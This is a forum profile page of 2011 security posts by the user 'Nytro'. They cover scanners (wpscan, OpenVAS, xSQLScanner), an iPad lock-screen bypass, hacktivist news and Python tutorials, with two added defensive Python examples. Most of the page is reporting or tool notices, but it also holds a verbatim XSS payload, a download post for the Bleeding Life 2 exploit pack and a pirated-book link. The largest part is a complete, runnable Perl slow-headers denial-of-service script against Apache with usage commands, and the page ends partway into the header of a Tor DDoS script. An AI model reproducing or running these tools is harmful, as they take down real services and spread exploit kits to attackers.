Nytro - Posts: 18732 - Days Won: 710

Everything posted by Nytro
Secure Your WordPress | Tool Explained: Wpscan

Description: WordPress is one of the most popular CMSs among all its open source competitors. WordPress has a very simple and open framework, and it is the most desirable choice for any hacker to start learning hacking with. Today we will look at a tool called wpscan. This tool is a vulnerability scanner for any WordPress installation. It will tell you the following things:
1. Version of the WordPress install
2. Known list of information disclosure files (e.g. readme.html)
3. WordPress usernames
4. WordPress plugin names
5. Bruteforce for passwords (a password list needs to be generated)

Video: http://www.securitytube.net/video/2367
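The checks the post lists, rebuilt as an added example (not code from the original post or from wpscan): version from the generator tag and from readme.html, plugin slugs and versions from asset URLs, and usernames from author-archive links. SAMPLE_INDEX and SAMPLE_README are constructed stand-ins for the front page and /readme.html a scanner would fetch; the regular expressions and the output dictionary are this example's own.

```python
"""Passive WordPress fingerprinting over constructed responses.

Added example, not code from the original post or from wpscan: it rebuilds
three of the checks the post lists (version, readme.html disclosure, plugin
and username enumeration) as plain regular expressions so the logic can be
read and run offline. SAMPLE_INDEX and SAMPLE_README are constructed stand-ins
for the front page and /readme.html a scanner would actually fetch.
"""
import re

# Constructed front page: generator tag, plugin assets with and without ?ver=, author links.
SAMPLE_INDEX = """<html><head>
<meta name="generator" content="WordPress 3.2.1" />
<link rel='stylesheet' href='/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=3.0.1' type='text/css' />
<script type='text/javascript' src='/wp-content/plugins/akismet/akismet.js?ver=2.5.3'></script>
<script type='text/javascript' src='/wp-content/plugins/akismet/akismet.js'></script>
</head><body>
<a href="/author/admin/" rel="author">admin</a>
<a href="/author/editor-jane/" rel="author">Jane</a>
<a href="/author/admin/" rel="author">admin again</a>
</body></html>"""

# Constructed /readme.html as shipped with a stock install and left in place by the site owner.
SAMPLE_README = """<html><body>
<h1 id="logo"><img alt="WordPress" src="wp-admin/images/wordpress-logo.png" /><br />Version 3.2.1</h1>
</body></html>"""

GENERATOR_RE = re.compile(
    r'<meta[^>]+name=["\']generator["\'][^>]+content=["\']WordPress\s+([\d.]+)', re.I)
README_RE = re.compile(r'Version\s+([\d.]+)\s*</h1>', re.I)
PLUGIN_RE = re.compile(r'/wp-content/plugins/([A-Za-z0-9_-]+)/[^"\'\s?]*(?:\?ver=([\d.]+))?')
AUTHOR_RE = re.compile(r'href=["\']/author/([A-Za-z0-9_.-]+)/?["\']', re.I)


def version_from_generator(index_html):
    """Version leaked by the <meta name="generator"> tag, or None if it was removed."""
    m = GENERATOR_RE.search(index_html)
    return m.group(1) if m else None


def version_from_readme(readme_html):
    """Version printed in the stock readme.html heading, or None if the file is absent or stripped."""
    m = README_RE.search(readme_html or "")
    return m.group(1) if m else None


def plugins_from_html(index_html):
    """Plugin slugs referenced from /wp-content/plugins/..., with the ?ver= value when present."""
    found = {}
    for slug, ver in PLUGIN_RE.findall(index_html):
        if ver or slug not in found:          # never overwrite a known version with None
            found[slug] = ver or None
    return found


def usernames_from_author_links(index_html):
    """Author-archive slugs (/author/<name>/), de-duplicated, in order of appearance."""
    return list(dict.fromkeys(AUTHOR_RE.findall(index_html)))


def fingerprint(index_html, readme_html=None):
    """Combine the checks into one report; readme_html=None models a 404 for /readme.html."""
    gen = version_from_generator(index_html)
    rd = version_from_readme(readme_html)
    return {
        "version": gen or rd,
        "readme_exposed": rd is not None,
        # Two independent sources disagreeing usually means a stale readme or a spoofed generator tag.
        "version_sources_agree": gen is None or rd is None or gen == rd,
        "plugins": plugins_from_html(index_html),
        "usernames": usernames_from_author_links(index_html),
    }


if __name__ == "__main__":
    for key, value in fingerprint(SAMPLE_INDEX, SAMPLE_README).items():
        print("%-22s %s" % (key + ":", value))
```

Removing the generator tag alone is not enough: the report still recovers the version from readme.html and the plugin versions from the `?ver=` query strings, which is exactly why a scanner checks all three.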
-
See what the link looks like, it needs some small modifications... Ex: Download Security_and_Hacking_Anti_Hacker_Tool_Kit_Second_Edition.chm for free on Filesonic.com
-
xSQLScanner 1.2 and Mono Version

From: Rodrigo Matuck <rodrigomatuck () globo com>
Date: Sun, 23 Oct 2011 21:47:25 -0200

Hi everyone,

I published at my blog a new tool called xSQLScanner. This program allows the user to audit MS-SQL and MySQL servers. Some features:
1 - 6 vulnerability audit options;
1.2 - Test for weak passwords fast;
1.3 - Test for wear/user passwords;
1.4 - Wordlist option;
1.5 - Userlist option;
2 - Portscanner
7 - Range IP address audit
and more.

Now the good news: I made 2 versions, Windows & Linux. The Linux version uses the Mono Project, so I compiled a Mono version to run under Linux (BackTrack 5 - GNOME).

Here are the instructions to install under Linux:
1 - get xsqlscan-mono.tgz - 4shared.com - online file sharing and storage - download
2 - tar -xzvf xsqlscan.tar.gz
3 - cd xsqlscan
4 - ./xsqlscanw
5 - The program will verify if you have the Mono core files. If you already have them, the application will launch.
5.1 - Answer 'yes' to download the libs and Mono core files
6 - Restart the application by typing: ./xsqlscanw
7 - Enjoy.

The link for the Windows version: xsqlscanner-1.2.zip - 4shared.com - online file sharing and storage - download

Remember: any bugs, suggestions, please contact me.

Regards

Source: Penetration Testing: xSQLScanner 1.2 and Mono Version
-
Owned and exposed - Nr. 3

-=[ISSUE - NO 3]=- -=[OF]=- Owned and exp0sed
Brought to you by your Happy Ninjas - "back once again here to rm"
(ASCII-art banner and table of contents of the zine, reproduced here as plain text)

Featuring...
- Intro
- St0re.cc
- El-Basar.biz
- Undercover.su
- k!LLu's Botnet
- Zion-Network.net
- Hackbase.cc
- The Happy Ninja Faker
- Swissfaking.net
- Vpn24.org
- Secure-Host.in
- Unique-Crew.net
- Some leftovers
- Outro

First of all, here is the verification of the sha1 hash we published when hba-crew got owned:
49bd4433fff1b04530dcaff1f52fa971ff895871 = sha1(HAPPY_NINJAS_ARE_STAYING_HAPPY_exp03)

=========={ Intro }=========-------

Tonight's the night. And it's going to happen, again and again. It has to happen.

We all want to welcome you to a brand new issue of Owned and exp0sed! Before we get to the fun part, we'd just like to clarify some things, since there has been a lot going on on the internet since our last issue. Movements, as they put it, like Anonymous or the short-lived phenomenon of Lulzsec have become an increasingly important topic for the media and the public. We want to lay out our motivation in contrast to theirs. Anonymous has tried to gain as much media attention as possible by inflicting the most damage possible on big companies and service providers. Similarly, Lulzsec have attacked various websites and published an enormous amount of information. However, while it's their goal to put pressure on governments and big organizations, it's ours to protect the public from the abysses of the internet. Fraud is our main concern and we intend to contain it as much as possible. While Anon and Lulzsec toss out their stuff within weeks, we take our time to gain access, collect data and aggregate it nicely for you, our readers. This is why there is a substantial time span between our releases. We of course also monitor the German and international fraud scene as it recovers from our attacks; it's hard to stop something that is driven by selfishness, greed and money.

We also find it worrying that Anonymous and especially Lulzsec act in what they call "Operation Antisec". The original Antisec Movement was brought to life by actual hackers and targeted full disclosure and the corporate security industry. Publishing gigantic amounts of (corporate) data on the internet does exactly the opposite: it provides the security industry with the attention they need and hence new customers.

But let's now look at why we are here today. "Money is the root of all evil", as the proverb has it; and it's why fraud communities do come back after we have owned and exposed them; but as long as they carry on, we do, too. Fraudsters ought to know that they're not safe, because we are going to hunt down every single site that is left. We see the fraud scene scattering wider and wider after every issue we have published; new boards, and with them new admins, emerge out of nowhere. That just shows again how stubborn fraudsters are, as most of them still refuse to accept that they lost their right to exist on the internet. It's particularly frustrating that they don't seem to draw lessons from getting owned again and again. That being said, we can just strongly advise you to spend your time on something worthwhile. It's not too late ...

Download: http://blog.yakuza112.org/wp-content/uploads/2011/10/exp03.txt
-
Agnitio Security Code Review Tool v2.1 released

OCTOBER 24, 2011 | WRITTEN BY SECURITY NINJA

Hi everyone,

I wanted to write a blog post today to let you all know that I've released Agnitio v2.1 today. I did plan to release this version a few weeks ago, but a combination of life and bugs/last minute feature changes delayed the release; better late than never though! I've made a lot of changes for this release, so I wanted to make extra sure that everything worked before I released it. Interestingly, Agnitio passed all of its QA tests in the first test run, but the Data Migration Tool was a different story!

The DMT is used to migrate users' existing data into the new Agnitio checklist database. It's probably not the best way to perform an upgrade and it certainly needs some work, but for now it works! Agnitio currently puts the new checklist database into the Program Files directory alongside the other Agnitio files, which can cause a bit of a problem because of the default file permissions on the Program Files directory. The Program Files directory in Windows 7 has better (the definition of "better" requires me to look at it as a security professional and not as someone writing code!) default permissions/restrictions than previous versions of Windows, I believe, which causes a problem when using Agnitio or the DMT as a standard user. The user obviously needs to be able to read data from the checklist database and of course write reviews or changes to the database. I tried a few different approaches to rectifying this and I've settled on a solution which probably isn't ideal, but it does mean standard users can use Agnitio on Windows 7. The DMT will need to be run as an administrator to migrate the data, but after that administrator privileges aren't needed anymore.

You will need to make a few permission changes regardless of the operating system you are using, so please make sure you read the Agnitio v2.1 User Guide (included as part of the installation) before you attempt to use the new version or migrate your data. I'm currently working on a better solution to this with a new contributor, so I'd expect to have a nicer solution to this problem when the next version of Agnitio is released!

So what's new in v2.1? I have listed all of the changes in this release below:
- Windows x64 support (thanks to Steven van der Baan).
- Decompile Android .apk files so you can analyse the source code and AndroidManifest.xml file. This uses tools like JAD, so you will need to have Java installed on your machine to decompile the Android .apk files.
- C# and Java rules from the OWASP Code Crawler tool imported into the Agnitio database and linked to the relevant checklist questions.
- New checklist items for mobile application security code reviews. These checklist items were created to address items in the OWASP top 10 mobile risks project that weren't covered by existing checklist items.
- Application profiles can now be configured as either "Web" or "Mobile". This will determine which checklist items from the database are used to create the checklist for the application being reviewed.
- Create new checklist items. You will be able to configure the relevant principle of secure development for the new checklist item as well as deciding whether this is a question for "Web", "Mobile" or "Both" types of applications.
- Modify existing checklist items. This was supposed to be included in v2.0, but a last minute change I made at 7am in a Las Vegas hotel room broke this functionality. You can now modify the text, the principle and type columns for questions in the checklist database.

I made a lot of small changes in addition to the ones above; I've listed some of the more obvious ones below:
- Only one answer allowed per checklist item (thanks to Steven van der Baan).
- Fixed a bug on the security code review tab where checklist items with no answers are highlighted in red and never "un-highlighted" (thanks to Steven van der Baan).
- Added a language checkbox for Objective-C on the profile creation and view profile tabs.
- Checklists are now sorted by principle and not by the question number.

I did have two issues which I couldn't get fixed, but I decided to release v2.1 now because it has already taken longer than I'd planned! The two issues will only affect x64 users and I will make sure they are fixed as part of v2.2:
- Android .apk decompile functionality will fail to decompile .apk files on Windows x64.
- Data Migration Tool (for upgrades from v2.0) is not supported on x64 at the moment. You can use the Data Migration Tool on x86 versions of Windows to migrate your v2.0 data.

I think I've included all of the new features and changes in this blog post, so all that's left for me to do now is give you the link to download v2.1: Agnitio v2.1

I have started to plan what will be included in v2.2, but I've not started working on it yet. I have a few cool ideas in mind for v2.2 which I think you will all like. I've released 5 versions of Agnitio over the past 11 months, which has eaten up a lot of my spare time, and I don't really enjoy working on one thing for a long time. I will be taking a couple of weeks away from the project before I start work on v2.2 to rest my poor overworked brain. I don't expect to release v2.2 until sometime after Christmas, partly because of the break I'm taking from the project, but mainly because of the amount of work that I will need to do to implement the cool changes I want to make!

As always I'd love to hear what you think of the latest version of Agnitio, so get in touch via Twitter, email or leave a comment on this blog post.

SN

Download: https://sourceforge.net/projects/agnitiotool/files/v2.1/
Source: https://www.securityninja.co.uk/application-security/agnitio-security-code-review-tool-v2-1-released/
-
Aidsql: SQL Injection Penetration Testing Tool

Description: This is a video showing you how to effectively audit your website with aidsql.

Download aidSQL: aidSQL: A Tools to Find Vulnerable Spots in Website - Insecure Stuff

Video: http://www.securitytube.net/video/2370
-
https://www.google.com/search?hl=en&q=yo%2C+what%27s+my+ip%3F%21
-
Python Programming Tutorials

Here are all of my high quality Python programming tutorials (by thenewboston):
1. Python Programming Tutorial - 1 - Installing Python (3:19)
2. Python Programming Tutorial - 2 - Numbers and Math (5:40)
3. Python Programming Tutorial - 3 - Variables (6:25)
4. Python Programming Tutorial - 4 - Modules and Functions (7:08)
5. Python Programming Tutorial - 5 - How to Save Your P... (8:25)
6. Python Programming Tutorial - 6 - Strings (6:23)
7. Python Programming Tutorial - 7 - More on Strings (5:28)
8. Python Programming Tutorial - 8 - Raw Input (2:56)
9. Python Programming Tutorial - 9 - Sequences and Lists (5:04)
10. Python Programming Tutorial - 10 - Slicing (7:43)
11. Python Programming Tutorial - 11 - Editing Sequences (6:43)
12. Python Programming Tutorial - 12 - More List Functions (6:28)
13. Python Programming Tutorial - 13 - Slicing Lists (4:58)
14. Python Programming Tutorial - 14 - Intro to Methods (6:02)
15. Python Programming Tutorial - 15 - More Methods (4:15)
16. Python Programming Tutorial - 16 - Sort and Tuples (3:57)
17. Python Programming Tutorial - 17 - Strings n Stuff (6:18)
18. Python Programming Tutorial - 18 - Cool String Methods (5:31)
19. Python Programming Tutorial - 19 - Dictionary (6:13)
20. Python Programming Tutorial - 20 - If Statement (5:50)
21. Python Programming Tutorial - 21 - else and elif (5:05)
22. Python Programming Tutorial - 22 - Nesting Statements (4:17)
23. Python Programming Tutorial - 23 - Comparison Operators (4:33)
24. Python Programming Tutorial - 24 - And and Or (6:15)
25. Python Programming Tutorial - 25 - For and While Loops (5:37)
26. Python Programming Tutorial - 26 - Infinite Loops an... (5:45)
27. Python Programming Tutorial - 27 - Building Functions (5:20)
28. Python Programming Tutorial - 28 - Default Parameters (4:04)
29. Python Programming Tutorial - 29 - Multiple Parameters (5:08)
30. Python Programming Tutorial - 30 - Parameter Types (6:10)
31. Python Programming Tutorial - 31 - Tuples as Parameters (4:22)
32. Python Programming Tutorial - 32 - Object Oriented P... (7:10)
33. Python Programming Tutorial - 33 - Classes and Self (7:48)
34. Python Programming Tutorial - 34 - Subclasses Superc... (4:12)
35. Python Programming Tutorial - 35 - Overwrite Variabl... (3:16)
36. Python Programming Tutorial - 36 - Multiple Parent C... (3:46)
37. Python Programming Tutorial - 37 - Constructors (4:17)
38. Python Programming Tutorial - 38 - Import Modules (6:51)
39. Python Programming Tutorial - 39 - reload Modules (4:21)
40. Python Programming Tutorial - 40 - Getting Module Info (5:21)
41. Python Programming Tutorial - 41 - Working with Files (6:28)
42. Python Programming Tutorial - 42 - Reading and Writing (5:23)
43. Python Programming Tutorial - 43 - Writing Lines (6:11)

Youtube: http://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
-
All About Python and Unicode

March 4, 2007 - 3:39pm - frank

Contents:
- A Starting Point
- Unicode Text in Python
  - Converting Unicode symbols to Python literals
  - Why doesn't "print" work?
- Codecs
  - From Unicode to binary
  - From binary to Unicode
- String Operations
- A wrinkle in {{{\U}}}
- Bugs in Python 2.0 & 2.1
- Python as a "universal recoder"
- Now the Fun Begins ... Unicode and the Real World
  - Unicode Filenames
    - Microsoft Windows
    - Unix/POSIX/Linux
    - Mac OS/X
  - Unicode and HTML
  - Unicode and XML
  - Unicode and network shares (Samba)
- Summary

Article: http://boodebr.org/main/python/all-about-python-and-unicode
-
iPad 2 iOS 5 Lock Screen Bypass Vulnerability + Video

Marc Gurman at 9to5Mac has discovered a vulnerability on the iPad that allows for a limited bypass of the device's lockscreen. Anyone with an iPad Smart Cover can gain access to the previously-open app (or the home screen if no app was open). By holding the power button to bring up the 'Power Off' screen, closing the Smart Cover, re-opening it, and clicking cancel, the attacker will be dropped into the screen that was open before the iPad was locked. If the attacker gets dropped into the home screen, then they'll be able to see the installed apps, but won't be able to open anything. If Safari or Mail (or any other app) was open when the device was locked, then the attacker would have access to that app.

From a locked iPad 2:
1) Lock a password protected iPad 2
2) Hold down the power button until the iPad 2 reaches the turn off slider
3) Close the Smart Cover
4) Open the Smart Cover
5) Click cancel on the bottom of the screen

Video: http://www.youtube.com/watch?v=NLgQ22naQhE

This isn't the first security issue Apple has experienced since rolling out iOS 5. On the brand new iPhone 4S it has been discovered that you can use Siri when a device is locked. Even if a passcode is required, Siri doesn't care and allows you to carry out functions such as sending email and text messages.

Protection Against the iPad 2 Lock Screen Bypass: For the time being, iPad 2 users are encouraged to disable the "Smart Cover unlocking" feature found in Settings > General.

Source: http://thehackernews.com/2011/10/ipad-2-ios-5-lock-screen-bypass.html
-
Anonymous Hackers Take Down 40 Child Porn Websites

Anonymous has taken down more than 40 darknet-based child porn websites over the last week. Details of some of the hacks have been released via pastebin under #OpDarknet, including the personal details of 1,500 users of a site named 'Lolita City', and DDoS tools that target Hidden Wiki and Freedom Hosting, alleged to be two of the biggest darknet sites hosting child porn. News of the Anonymous campaign to actively target anyone hosting child porn sites comes from statements associated with Anonymous on Pastebin and two Anonymous YouTube video channels. AnonNews has yet to issue a press release. The AnonMessage and BecomeAnonymous YouTube channels both posted videos with statements of intent to hunt, skin and kill pedobears everywhere, starting with Freedom Hosting.

Source: http://thehackernews.com/2011/10/anonymous-hackers-take-down-40-child.html
-
OpenVAS - Advanced Open Source vulnerability scanner

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. The powerful and comprehensive OpenVAS solution is available as Free Software and maintained on a daily basis.

An overview of the vulnerability handling process is:
- The reporter reports the vulnerability privately to OpenVAS.
- The appropriate component's developers work privately with the reporter to resolve the vulnerability.
- A new release of the OpenVAS component concerned is made that includes the fix.

The OpenVAS Manager is the central service that consolidates plain vulnerability scanning into a full vulnerability management solution. The Manager controls the Scanner via OTP (OpenVAS Transfer Protocol) and itself offers the XML-based, stateless OpenVAS Management Protocol (OMP). All intelligence is implemented in the Manager so that it is possible to implement various lean clients that will behave consistently, e.g. with regard to filtering or sorting scan results. The Manager also controls a SQL database (sqlite-based) where all configuration and scan result data is centrally stored.

Download: http://www.openvas.org/download.html
Source: OpenVAS - Advanced Open Source vulnerability scanner ~ THN : The Hacker News
-
XSS Vulnerability in Interactive YouTube API Demo Beta

There is a critical cross-site scripting (XSS) vulnerability in the Interactive YouTube API Demo Beta, discovered by various sources. One of the white hat hackers, "Vansh Sharma", informed us about this XSS vulnerability with a proof of concept.

Proof of Concept:
1. Open YouTube Data API - Demo Beta
2. Enter the script <img src="<img src=search"/onerror=alert("xss")//"> in the keyword area.
3. Press ADD

Source: XSS Vulnerability in Interactive YouTube API Demo Beta ~ THN : The Hacker News
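What the proof-of-concept string becomes once a page drops it into its markup, as an added example (not code from the YouTube demo page, whose actual render path is not known): render_unsafe() is a hypothetical concatenation template standing in for a vulnerable keyword display, find_event_handlers() parses the rendered output the way a browser tokenizer would and lists every on* attribute, and render_safe() is the same template with output encoding. The template, the function names and the parser check are this example's own assumptions.

```python
"""What the published payload becomes once a page drops it into its markup.

Added example, not code from the YouTube demo page: its real render path is
not known, so render_unsafe() is a hypothetical concatenation template that
stands in for it. find_event_handlers() parses the result the way a browser
tokenizer would and lists every on* attribute, which is the check to run on
rendered output. render_safe() is the same template with output encoding.
"""
import html
from html.parser import HTMLParser

# The proof-of-concept string from the post, verbatim.
PAYLOAD = '<img src="<img src=search"/onerror=alert("xss")//">'


def render_unsafe(keyword):
    """Hypothetical vulnerable template: the keyword lands in HTML text context unencoded."""
    return "<p>Results for: " + keyword + "</p>"


def render_safe(keyword):
    """Same template with output encoding; quote=True also covers quoted attribute contexts."""
    return "<p>Results for: " + html.escape(keyword, quote=True) + "</p>"


class _HandlerFinder(HTMLParser):
    """Records (tag, attribute) for every event-handler attribute the tokenizer produces."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        # The inner quote in the payload closes src="..." early; the tokenizer then sees
        # the bare onerror=... attribute on a real <img> element, which is what fires.
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name.lower()))


def find_event_handlers(markup):
    """Return the on* attributes present in markup; an empty list means nothing executable."""
    finder = _HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.handlers


if __name__ == "__main__":
    print("unsafe:", find_event_handlers(render_unsafe(PAYLOAD)))
    print("safe:  ", find_event_handlers(render_safe(PAYLOAD)))
```

The encoded render contains no `<` at all, so there is no element for a handler to attach to; the same parser check can be run over any template's output as a regression test instead of trying to blacklist tag names, which nested payloads like this one are built to slip past.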
-
Bleeding Life 2 Exploit Pack Released

Black Hat Academy releases the Bleeding Life 2 exploit pack. This is an exploit pack that targets Windows-based web browsers via Adobe and Java. You can read all about it, and download it for yourself. Statistics are kept based on exploit, browser, and OS version.

Exploits
[+] Adobe
- CVE-2008-2992
- CVE-2010-1297
- CVE-2010-2884
- CVE-2010-0188
[+] Java
- CVE-2010-0842
- CVE-2010-3552
- Signed Applet

Features
- Advanced Statistical Information
- Stylish Progress Bars
- Full User-Friendly Admin Panel
- Referer Stats
- Secure Panel - Login/Logout
- Ability To Set and Save Passwords On Panel
- Ability To Allow Guest Access - Guest Can Only View Stats Page, Clicking and Other Pages Disabled.
- Ability To Add and/or Remove Exploits Used
- Ability To Add Scan4You Credentials For Built-In Scanner Use
- Ability To Filter Browsers
- Ability To Filter Operating Systems
- Attempt To Detect and Filter HTTP Proxies
- Ability To Blacklist by IP/Range
- Ability To Import Blacklist On Panel
- Built In Scanner
- Ability To Upload Payload From Panel
- Payload Statistical Information - MD5, Size, SHA1
- Ability To Generate iFrame On Panel / Encrypted
- Ability To Domain Check/Scan On Panel

Download: http://www.blackhatacademy.org/releases/bleeding-life-2-download.tgz
Source: http://thehackernews.com/2011/10/bleeding-life-2-exploit-pack-released.html
-
Apache Server Denial of Service exploit (DDOS)

#!/usr/bin/perl -w
# Exploit Title: Apache Server Denial of Service exploit (DDOS)
# Date: 22/10/2011
# Author: Xen0n
# Software Link: http://www.apache.org/dyn/closer.cgi
# Version: 2.3.14 and older
# Tested on: CentOs
#feel free to contact us xenon.sec@gmail.com

use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;

$SIG{'PIPE'} = 'IGNORE';    #Ignore broken pipe errors

print <<EOTEXT;
ooooooo  ooooo                                .oooo.
 `8888    d8'                                d8P'`Y8b
  Y888..8P      .ooooo.  ooo. .oo.          888    888  ooo. .oo.
   `8888'      d88' `88b `888P"Y88b         888    888  `888P"Y88b
  .8PY888.     888ooo888  888   888         888    888   888   888
 d8'  `888b    888    .o  888   888         `88b  d88'   888   888
o888o  o88888o `Y8bod8P' o888o o888o         `Y8bd8P'   o888o o888o

Welcome to Xen0n Apache Attacker
EOTEXT

my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $xenon, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
    'shost=s'   => \$shost,
    'dns=s'     => \$host,
    'xenon'     => \$xenon,
    'num=i'     => \$connections,
    'cache'     => \$cache,
    'port=i'    => \$port,
    'https'     => \$ssl,
    'tcpto=i'   => \$tcpto,
    'test'      => \$test,
    'timeout=i' => \$timeout,
    'version'   => \$version,
);

if ($version) {
    print "Version 1.0\n";
    exit;
}

unless ($host) {
    print "Test:\n\n\tperl $0 -dns [www.example.com] -test\n";
    print "Usage:\n\n\tperl $0 -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon\n";
    print "\n\temail: xenon.sec@ gmail.com\n";
    print "\n";
    exit;
}
unless ($port) {
    $port = 80;
    print "Defaulting to port 80.\n";
}
unless ($tcpto) {
    $tcpto = 5;
    print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
    unless ($timeout) {
        $timeout = 100;
        print "Defaulting to a 100 second re-try timeout.\n";
    }
    unless ($connections) {
        $connections = 1000;
        print "Defaulting to 1000 connections.\n";
    }
}

my $usemultithreading = 0;
if ( $Config{usethreads} ) {
    print "Multithreading enabled.\n";
    $usemultithreading = 1;
    use threads;
    use threads::shared;
}
else {
    print "No multithreading capabilites found!\n";
    print "Xen0n will be slower than normal as a result.\n";
}

my $packetcount : shared     = 0;
my $failed : shared          = 0;
my $connectioncount : shared = 0;

srand() if ($cache);

if ($shost) {
    $sendhost = $shost;
}
else {
    $sendhost = $host;
}
if ($xenon) {
    $method = "POST";
}
else {
    $method = "GET";
}

if ($test) {
    my @times = ( "1", "30", "90", "240", "500" );
    my $totaltime = 0;
    foreach (@times) {
        $totaltime = $totaltime + $_;
    }
    $totaltime = $totaltime / 60;
    print "Testing $host could take up to $totaltime minutes.\n";

    my $delay   = 0;
    my $working = 0;
    my $sock;

    if ($ssl) {
        if (
            $sock = new IO::Socket::SSL(
                PeerAddr => "$host",
                PeerPort => "$port",
                Timeout  => "$tcpto",
                Proto    => "tcp",
            )
          )
        {
            $working = 1;
        }
    }
    else {
        if (
            $sock = new IO::Socket::INET(
                PeerAddr => "$host",
                PeerPort => "$port",
                Timeout  => "$tcpto",
                Proto    => "tcp",
            )
          )
        {
            $working = 1;
        }
    }
    if ($working) {
        if ($cache) {
            $rand = "?" . int( rand(99999999999999) );
        }
        else {
            $rand = "";
        }
        my $primarypayload =
            "GET /$rand HTTP/1.1\r\n"
          . "Host: $sendhost\r\n"
          . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
          . "Content-Length: 42\r\n";
        if ( print $sock $primarypayload ) {
            print "Connection successful, now just wait...\n";
        }
        else {
            print "That's odd - I connected but couldn't send the data to $host:$port.\n";
            print "Is something wrong?\nDying.\n";
            exit;
        }
    }
    else {
        print "Uhm... I can't connect to $host:$port.\n";
        print "Is something wrong?\nDying.\n";
        exit;
    }
    for ( my $i = 0 ; $i <= $#times ; $i++ ) {
        print "Trying a $times[$i] second delay: \n";
        sleep( $times[$i] );
        if ( print $sock "X-a: b\r\n" ) {
            print "\tWorked.\n";
            $delay = $times[$i];
        }
        else {
            if ( $SIG{__WARN__} ) {
                $delay = $times[ $i - 1 ];
                last;
            }
            print "\tFailed after $times[$i] seconds.\n";
        }
    }

    if ( print $sock "Connection: Close\r\n\r\n" ) {
        print "Okay that's enough time. Xen0n closed the socket.\n";
        print "Use $delay seconds for -timeout.\n";
        exit;
    }
    else {
        print "Remote server closed socket.\n";
        print "Use $delay seconds for -timeout.\n";
        exit;
    }
    if ( $delay < 166 ) {
        print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all...  you might have trouble using Xen0n against this target.  You can
tweak the -tcpto flag down to 1 second but it still may not build the
sockets in time.
EOSUCKS2BU
    }
}
else {
    print "Attacking $host:$port every $timeout seconds with $connections sockets:\n";
    if ($usemultithreading) {
        domultithreading($connections);
    }
    else {
        doconnections( $connections, $usemultithreading );
    }
}

sub doconnections {
    my ( $num, $usemultithreading ) = @_;
    my ( @first, @sock, @working );
    my $failedconnections = 0;
    $working[$_] = 0 foreach ( 1 .. $num );    #initializing
    $first[$_]   = 0 foreach ( 1 .. $num );    #initializing

    while (1) {
        $failedconnections = 0;
        print "\t\tBuilding sockets.\n";
        foreach my $z ( 1 .. $num ) {
            if ( $working[$z] == 0 ) {
                if ($ssl) {
                    if (
                        $sock[$z] = new IO::Socket::SSL(
                            PeerAddr => "$host",
                            PeerPort => "$port",
                            Timeout  => "$tcpto",
                            Proto    => "tcp",
                        )
                      )
                    {
                        $working[$z] = 1;
                    }
                    else {
                        $working[$z] = 0;
                    }
                }
                else {
                    if (
                        $sock[$z] = new IO::Socket::INET(
                            PeerAddr => "$host",
                            PeerPort => "$port",
                            Timeout  => "$tcpto",
                            Proto    => "tcp",
                        )
                      )
                    {
                        $working[$z] = 1;
                        $packetcount = $packetcount + 3;    #SYN, SYN+ACK, ACK
                    }
                    else {
                        $working[$z] = 0;
                    }
                }
                if ( $working[$z] == 1 ) {
                    if ($cache) {
                        $rand = "?" . int( rand(99999999999999) );
                    }
                    else {
                        $rand = "";
                    }
                    my $primarypayload =
                        "$method /$rand HTTP/1.1\r\n"
                      . "Host: $sendhost\r\n"
                      . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
                      . "Content-Length: 42\r\n";
                    my $handle = $sock[$z];
                    if ($handle) {
                        print $handle "$primarypayload";
                        if ( $SIG{__WARN__} ) {
                            $working[$z] = 0;
                            close $handle;
                            $failed++;
                            $failedconnections++;
                        }
                        else {
                            $packetcount++;
                            $working[$z] = 1;
                        }
                    }
                    else {
                        $working[$z] = 0;
                        $failed++;
                        $failedconnections++;
                    }
                }
                else {
                    $working[$z] = 0;
                    $failed++;
                    $failedconnections++;
                }
            }
        }
        print "\t\tSending data.\n";
        foreach my $z ( 1 .. $num ) {
            if ( $working[$z] == 1 ) {
                if ( $sock[$z] ) {
                    my $handle = $sock[$z];
                    if ( print $handle "X-a: b\r\n" ) {
                        $working[$z] = 1;
                        $packetcount++;
                    }
                    else {
                        $working[$z] = 0;    #debugging info
                        $failed++;
                        $failedconnections++;
                    }
                }
                else {
                    $working[$z] = 0;    #debugging info
                    $failed++;
                    $failedconnections++;
                }
            }
        }
        print "Current stats:\tXen0n has sent $packetcount packets to $host.\nThe attack will sleep for $timeout seconds...\n\n";
        sleep($timeout);
    }
}

sub domultithreading {
    my ($num) = @_;
    my @thrs;
    my $i                    = 0;
    my $connectionsperthread = 50;
    while ( $i < $num ) {
        $thrs[$i] = threads->create( \&doconnections, $connectionsperthread, 1 );
        $i += $connectionsperthread;
    }
    my @threadslist = threads->list();
    while ( $#threadslist > 0 ) {
        $failed = 0;
    }
}

__END__

Source: Apache HTTP server Denial of service vulnerability
-
Pedo Gun - PEW PEW - Anonymous DDOSer

#!/usr/bin/python
# this assumes you have the socks.py (http://phiral.net/socks.py)
# and terminal.py (http://phiral.net/terminal.py). DDoS used to take out Hidden Wiki and
# Freedom Hosting sites. Based of Tor Hammer by entropy. Uses SLLLLLLOOOOW HEADERS
# Chris H. [redacted to avoid copyright issues] attack

import os
import re
import time
import sys
import random
import math
import getopt
import socks
import string
import terminal
from threading import Thread

global stop_now
global term

stop_now = False
term = terminal.TerminalController()

